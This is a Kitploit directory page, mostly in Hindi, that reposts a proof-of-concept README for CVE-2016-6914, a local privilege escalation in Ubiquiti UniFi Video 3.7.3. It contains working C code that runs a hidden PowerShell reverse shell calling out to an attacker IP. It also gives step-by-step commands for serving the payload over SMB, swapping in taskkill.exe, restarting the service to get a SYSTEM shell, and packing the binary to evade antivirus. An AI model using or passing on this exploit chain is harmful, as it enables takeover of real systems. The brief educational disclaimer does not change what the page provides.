Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
उपकरण/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
विशेषाधिकार वृद्धिशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC

🔥 अवलोकन

इस रिपॉजिटरी में CVE-2016-6914 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) है, जो Ubiquiti UniFi Video 3.7.3 को प्रभावित करने वाली स्थानीय विशेषाधिकार वृद्धि (LPE) कमजोरी है।

निम्न विशेषाधिकारों वाला हमलावर C:\ProgramData\unifi-video\ के अंदर एक विश्वसनीय बाइनरी (taskkill.exe) को दुर्भावनापूर्ण कोड से बदल सकता है, जो SYSTEM विशेषाधिकारों के साथ निष्पादित होता है।


⚡ शोषण

शोषण के चरण

1️⃣ taskkill.exe को एक दुर्भावनापूर्ण पेलोड (exploit.exe) से बदलें।
2️⃣ UniFi Video Service के चलने तक प्रतीक्षा करें या इसे मैन्युअल रूप से पुनरारंभ करें।
3️⃣ दुर्भावनापूर्ण पेलोड निष्पादित होता है, जिससे SYSTEM शेल प्राप्त होता है।


🚀 शामिल पेलोड

  • ✅ PowerShell रिवर्स शेल
  • ✅ Netcat रिवर्स शेल
  • ✅ AV बाईपास तकनीकें

📜 PoC कोड (PowerShell रिवर्स शेल)

यह पेलोड taskkill.exe को बदलता है और एक रिवर्स शेल लॉन्च करता है।

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}

✅ MinGW का उपयोग करके संकलित करें: x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

🛠️ उपयोग निर्देश

1️⃣ SMB शेयर सेट करें (रिमोट फ़ाइल वितरण के लिए) Kali पर, चलाएं: impacket-smbserver share . -smb2support

2️⃣ Netcat लिसनर प्रारंभ करें nc -lvnp 4444

3️⃣ लक्ष्य मशीन पर पेलोड पहुंचाएं लक्ष्य सिस्टम पर निम्न PowerShell कमांड चलाएं: copy \10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe stop-service UnifiVideoService -Force start-service UnifiVideoService

4️⃣ SYSTEM शेल प्राप्त करें एक बार निष्पादित होने पर, आपके लिसनर पर एक SYSTEM शेल खुल जाता है!


🛡️ एंटीवायरस (AV) को बाईपास करना

बुनियादी AV पहचान से बचने के लिए, प्रयास करें:

  • ✔️ एक्जीक्यूटेबल पैक करना (UPX): upx --best --lzma exploit.exe
  • ✔️ system() के बजाय वैकल्पिक सिस्कॉल का उपयोग करना।
  • ✔️ DLL इंजेक्शन का उपयोग करके वैध प्रक्रियाओं में एम्बेड करना।

⚠️ अस्वीकरण

📢 यह PoC केवल शैक्षिक उद्देश्यों के लिए है! 🛑 अनधिकृत उपयोग अवैध और दंडनीय है। 👨‍💻 इसका उपयोग केवल कानूनी और नैतिक तरीके से करें।

Reference:https://www.exploit-db.com/exploits/43390

टूल डाउनलोड करें